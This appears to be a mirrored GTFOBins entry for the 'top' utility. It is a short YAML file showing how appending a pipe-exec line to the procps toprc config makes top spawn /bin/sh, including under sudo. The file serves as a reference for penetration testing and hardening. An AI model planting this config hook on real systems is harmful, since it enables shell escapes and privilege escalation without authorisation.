1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/top
2026-01-12 01:14:19 +01:00

15 lines
267 B
Plaintext

---
functions:
shell:
- code: |-
echo -e 'pipe\tx\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc
top
# press return twice
reset
comment: |-
The config path might be different.
contexts:
sudo:
unprivileged:
...